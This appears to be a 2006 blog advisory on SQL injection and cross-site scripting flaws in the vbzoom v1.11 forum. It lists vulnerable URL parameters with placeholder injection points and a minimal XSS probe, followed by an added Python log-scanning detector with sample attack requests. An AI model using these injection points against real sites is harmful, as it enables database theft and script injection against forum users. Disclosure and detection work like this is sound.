ecoestadistica.com

Monday, March 06, 2006

SQL injection & XSS in vbzoom v1.11

vbzoom v1.11

Web Site: http://www.vbzoom.com

Versions: V1.11

== SQL Injection ==

http://www.victima.com/vz/show.php?UserID=1&MainID=1&SubjectID=[SQL]

http://www.victima.com/vz/show.php?UserID=1&MainID=[SQL]&SubjectID=1

== XSS ==

http://www.victima.com/vz/comment.php?UserID='>XSS

http://www.victima.com/vz/profile.php?UserID=1&UserName='>XSS

http://www.victima.com/vz/contact.php?UserID='>XSS
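
A detection check for the parameters listed above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to the affected scripts whose ID parameters are not plain integers or whose UserName contains quote or markup characters. The integer-only rule, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scripts and parameters named in the advisory.
NUMERIC_PARAMS = {
    "show.php": ("UserID", "MainID", "SubjectID"),
    "comment.php": ("UserID",),
    "profile.php": ("UserID",),
    "contact.php": ("UserID",),
}
# Assumption: UserName is free text, so only quote/markup characters are flagged.
TEXT_PARAMS = {"profile.php": ("UserName",)}
MARKUP = re.compile(r"""['"<>]""")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return sorted names of advisory parameters whose value looks unsafe."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    hits = set()
    for name in NUMERIC_PARAMS.get(script, ()):
        # Assumption: these IDs are integers, as in the advisory's sample URLs.
        if any(not (v.isascii() and v.isdigit()) for v in query.get(name, [])):
            hits.add(name)
    for name in TEXT_PARAMS.get(script, ()):
        if any(MARKUP.search(v) for v in query.get(name, [])):
            hits.add(name)
    return sorted(hits)


def scan(log_lines):
    """Yield (line_number, url, params) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            params = suspicious_params(match.group(1))
            if params:
                yield number, match.group(1), params


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2006:10:00:00 +0000] "GET /vz/show.php?UserID=1&MainID=1&SubjectID=7 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [06/Mar/2006:10:00:05 +0000] "GET /vz/show.php?UserID=1&MainID=1&SubjectID=1%27 HTTP/1.1" 200 5120',
    '192.0.2.12 - - [06/Mar/2006:10:00:09 +0000] "GET /vz/profile.php?UserID=1&UserName=alice HTTP/1.1" 200 2048',
    '192.0.2.13 - - [06/Mar/2006:10:00:12 +0000] "GET /vz/contact.php?UserID=%27%3Ex HTTP/1.1" 200 1024',
]
```

The same integer-only rule can be enforced at a reverse proxy or WAF in front of the forum until the application itself validates these parameters.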
